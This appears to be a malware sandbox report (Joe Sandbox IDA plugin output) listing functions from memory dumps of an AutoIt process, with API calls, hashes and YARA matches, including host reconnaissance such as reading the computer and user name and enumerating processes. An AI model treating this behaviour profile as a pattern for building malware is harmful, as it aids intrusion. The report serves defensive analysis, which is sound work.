Function 00C7E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C7E2EA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c0aa936b71f361f19d0d25d8a7cd148c1ba8e0141c829ecdeba796ab6b1a18df
Instruction ID: a70c9e1938e1432a7cb693a4a26c02bd7dfd5be73aae2779913cbf5e8edf222d
Opcode Fuzzy Hash: c0aa936b71f361f19d0d25d8a7cd148c1ba8e0141c829ecdeba796ab6b1a18df
Instruction Fuzzy Hash: 50413974508351DFDB24DF14C584B1ABBE1BF45318F1989ACE8998B362C371EC85DB52

Function 00C549C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C54B29: FreeLibrary.KERNEL32(00000000,?), ref: 00C54B63

Part of subcall function 00C6547B: __wfsopen.LIBCMT ref: 00C65486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C527AF,?,00000001), ref: 00C549F4

Part of subcall function 00C54ADE: FreeLibrary.KERNEL32(00000000), ref: 00C54B18

Part of subcall function 00C548B0: _memmove.LIBCMT ref: 00C548FA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 4b3d817f6b2f0cf81941bd5ade9dbee8a49ecd4bb54a1ae455a9f91fa015538e
Instruction ID: 6f1c341d9c2386536ea66e3866f7cec4f8b00a672af7b8326c464e109efbe7d9
Opcode Fuzzy Hash: 4b3d817f6b2f0cf81941bd5ade9dbee8a49ecd4bb54a1ae455a9f91fa015538e
Instruction Fuzzy Hash: F711E735650205ABCF18FB74CC06FAE77A99F40706F204429F941A61C2EF709AD8B798

Function 00C7E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C7E3CE

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 78506a251b665b73847c5d54c4f471dbebad508f4eca72e41f1cf0cce824e7ca
Instruction ID: 0e802bb9a617074752a795d74876e28bb832eb3e57270e7ea140a78ef72867e2
Opcode Fuzzy Hash: 78506a251b665b73847c5d54c4f471dbebad508f4eca72e41f1cf0cce824e7ca
Instruction Fuzzy Hash: 5E21F2B4508341DFDB24DF54C584B1ABBE5BF89304F09896CF89A57362C731E849DB92

Function 00C54220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00C53CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C54276

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9157c3ad0f49bbb6fd5a6daccd96c7eaca079ead685fb4f58e24910540d89f61
Instruction ID: 6301b63337dc799e1a0cdadfc25c7914b7c068427f293516e82e743743a0b698
Opcode Fuzzy Hash: 9157c3ad0f49bbb6fd5a6daccd96c7eaca079ead685fb4f58e24910540d89f61
Instruction Fuzzy Hash: 9D116D352047109FD324CF45C880B66B7F5EF44715F10C91DE8AA8B641D770E9C9CB64

Function 04721130 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000011), ref: 0472116A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 1821e613dd18a0d6bbdce72c52ec89d4b3db7161da9e142ff331d334c37a56d6
Instruction ID: bd409f28503f150f2ba2bf66126546acfba002c1a491b0bf0b52ddd1fd0f123b
Opcode Fuzzy Hash: 1821e613dd18a0d6bbdce72c52ec89d4b3db7161da9e142ff331d334c37a56d6
Instruction Fuzzy Hash: F7014F71B046089FEB04EFA5DD519DEB3FDEB4C304B91843AD901E3641FA74B5048A65

Function 0179C2C5 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 0179C2F7

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
Instruction ID: 05537e999fc65041657679ec6e80a5c8e4dd20a10a3c8d946a035c566335db69
Opcode Fuzzy Hash: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
Instruction Fuzzy Hash: 12F0A0717002019FCF11DA5CE9C4F56B3DC8F5C280B0480A0B648CB34CDB60DD4843A2

Function 00C7DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00C60FE6: std::exception::exception.LIBCMT ref: 00C6101C
Part of subcall function 00C60FE6: __CxxThrowException@8.LIBCMT ref: 00C61031

_memmove.LIBCMT ref: 00C7DC8B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 822e073b979b01a60d8c400866c0d16c4e67a578bc9371f30400c024d109022d
Instruction ID: 95c03863887721f28cc35bf60df93adf070b4a93c7c2f6e84efbd8df12c6cdea
Opcode Fuzzy Hash: 822e073b979b01a60d8c400866c0d16c4e67a578bc9371f30400c024d109022d
Instruction Fuzzy Hash: 3FF0FF74604101EFD725DF68C581E15BBE1BF19300B38845CF6898B352E733D811DB92

Function 00C54A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00C54AA4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 00f2f1e413a8668580f739cf01a33de5254a6eaa9ff8b7a460fe4547fdae62a9
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: C6F085BA400208BFDF148F85DC04CEBBB79EB89324F244198F9045A211D232EA61EBA0

Function 00C54A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00C527AF,?,00000001), ref: 00C54A63

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 68f3682ef80f4907ebbd65bad6b846c30b73e8837258963a146a340ff5638350
Instruction ID: 969e1add4774d347aff5da76c6f39dfd0341b12fd3263ab03515806abd0cbed0
Opcode Fuzzy Hash: 68f3682ef80f4907ebbd65bad6b846c30b73e8837258963a146a340ff5638350
Instruction Fuzzy Hash: E7F01C75145701CFCB789F65E49481ABBF0AF1431A320892EE5E783611C7319AC8EB48

Function 047210D4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 047210F8

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ee3d026f0f75b41d3c9f07cb2b86a426924895cbc8cbdb5e1bbaece7e37bdc07
Instruction ID: 597ab5b420eb811b0e936e37985c0dc3d75927903113048b6f82da88f6a29d1a
Opcode Fuzzy Hash: ee3d026f0f75b41d3c9f07cb2b86a426924895cbc8cbdb5e1bbaece7e37bdc07
Instruction Fuzzy Hash: 40E06D3230420057E300BA64DC8058BB2D9AB84304F10883D6AC687782FEB9F9485296

Function 00C54AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C54AD0

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: bdd1b4b0596a8fb2d1185b88e091954244a1ac4ce5824d57f6a0aa6b167ca4bc
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 0AF0F87640020DFFDF05CF90C945EAABB79FB18314F208589FD198B252D336DA61AB91

Function 00C80A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C80A84

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 883d397dc006cc19e3efc20b69d9c82b957a55c526ffc6947776dbe2099ffa2c
Instruction ID: d8db7c819c570645b34e060b56db35932685b257d6095e230a6cfe4e9cff432c
Opcode Fuzzy Hash: 883d397dc006cc19e3efc20b69d9c82b957a55c526ffc6947776dbe2099ffa2c
Instruction Fuzzy Hash: 15E061717083415EE774EF79D404B62FFD4BB00315F34461AD4A5C1280E3755C98B7A2

Function 0179BC79 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 0179BC97

Part of subcall function 0179BF0D: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 0179BF28
Part of subcall function 0179BF0D: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179BF46
Part of subcall function 0179BF0D: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179BF64
Part of subcall function 0179BF0D: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0179BF82
Part of subcall function 0179BF0D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,0179C011,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0179BFCB
Part of subcall function 0179BF0D: RegQueryValueExA.ADVAPI32(?,0179C18D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,0179C011,?,80000001), ref: 0179BFE9
Part of subcall function 0179BF0D: RegCloseKey.ADVAPI32(?,0179C018,00000000,00000000,00000005,00000000,0179C011,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0179C00B

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
Instruction ID: 5f1eda333c32122ba96e211fc3f9f5bbd18aacf25bd693bf28b6cb5f7e86bd8d
Opcode Fuzzy Hash: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
Instruction Fuzzy Hash: 02E06D71A002249FCF10DF5CA9C4E4673E8AB08754F000555EC54CF34AD771D9148BD1

Function 046F58B8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 046F58D6

Part of subcall function 046F5B4C: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 046F5B67
Part of subcall function 046F5B4C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5B85
Part of subcall function 046F5B4C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5BA3
Part of subcall function 046F5B4C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 046F5BC1
Part of subcall function 046F5B4C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,046F5C50,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 046F5C0A
Part of subcall function 046F5B4C: RegQueryValueExA.ADVAPI32(?,046F5DCC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,046F5C50,?,80000001), ref: 046F5C28
Part of subcall function 046F5B4C: RegCloseKey.ADVAPI32(?,046F5C57,00000000,00000000,00000005,00000000,046F5C50,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 046F5C4A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 810bb714ed69f198b16cb7bba543da0c273e170863ef6b13f5ecf574b77f4931
Instruction ID: a0726300e9e44aecf08e6c4cc15da1864d75d04ff7ba707675f1c4d2ad10c89c
Opcode Fuzzy Hash: 810bb714ed69f198b16cb7bba543da0c273e170863ef6b13f5ecf574b77f4931
Instruction Fuzzy Hash: C0E06D71A00320DBDB10DE9CC8C0A8633D8BF08654F400965AEA4CF346E7B0ED6087D4

Function 00C609C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C609E4

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 28e7438d7cf40c3fbc64a471820f76fa99d405bc1331edece385b163ea7ed102
Instruction ID: ad2430d2326fb6c62f92aa8be0f786e5735414718b72f57ef56caf3f0a848c6f
Opcode Fuzzy Hash: 28e7438d7cf40c3fbc64a471820f76fa99d405bc1331edece385b163ea7ed102
Instruction Fuzzy Hash: C7E0863690012857C72196AC9C05FEE77DDDB89691F0542B7FD0CD7254D960AC818691

Function 046FE024 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 046FDD68: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,046FDFEF,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDD7C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 046FDD94
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 046FDDA6
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 046FDDB8
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 046FDDCA
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 046FDDDC
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 046FDDEE
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32First), ref: 046FDE00
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 046FDE12
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 046FDE24
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 046FDE36
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 046FDE48
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 046FDE5A
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32First), ref: 046FDE6C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 046FDE7E
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 046FDE90
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 046FDEA2

Process32Next.KERNEL32(?,00000128), ref: 046FE035

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModuleNextProcess32
String ID:
API String ID: 2237597116-0
Opcode ID: 3a70b7a8e15b1f5d247e15f0df533a8056b59e6553d9f793eecaca1b3e032517
Instruction ID: ff49a5637757f28c3c831136ce2a9e2084ea836028a133ed189f4bf8080513c4
Opcode Fuzzy Hash: 3a70b7a8e15b1f5d247e15f0df533a8056b59e6553d9f793eecaca1b3e032517
Instruction Fuzzy Hash: 06C08053201320175B2066F42C84CC7574CCD450F730444A7F745D3112E2655C1092E0

Function 046FE004 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 046FDD68: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,046FDFEF,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDD7C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 046FDD94
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 046FDDA6
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 046FDDB8
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 046FDDCA
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 046FDDDC
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 046FDDEE
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32First), ref: 046FDE00
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 046FDE12
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 046FDE24
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 046FDE36
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 046FDE48
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 046FDE5A
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32First), ref: 046FDE6C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 046FDE7E
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 046FDE90
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 046FDEA2

Process32First.KERNEL32(?,00000128), ref: 046FE015

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$FirstHandleModuleProcess32
String ID:
API String ID: 2774106396-0
Opcode ID: 0faf4d418f36d2ef8103a05ec18d5bb90e982f214f2933e29f856783b6ade47f
Instruction ID: 828ef9ab3aab6e56000fa0554709ef14d673ebe1e3c8d2bbdccd427121f8fe91
Opcode Fuzzy Hash: 0faf4d418f36d2ef8103a05ec18d5bb90e982f214f2933e29f856783b6ade47f
Instruction Fuzzy Hash: B6C08052201220175B2066F42C848C7578CCD490B730404A3F745D7112E2595C1092E0

Function 046FDFE4 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON

Download Yara Rule

APIs

Part of subcall function 046FDD68: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,046FDFEF,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDD7C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 046FDD94
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 046FDDA6
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 046FDDB8
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 046FDDCA
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 046FDDDC
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 046FDDEE
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32First), ref: 046FDE00
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 046FDE12
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 046FDE24
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 046FDE36
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 046FDE48
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 046FDE5A
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32First), ref: 046FDE6C
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 046FDE7E
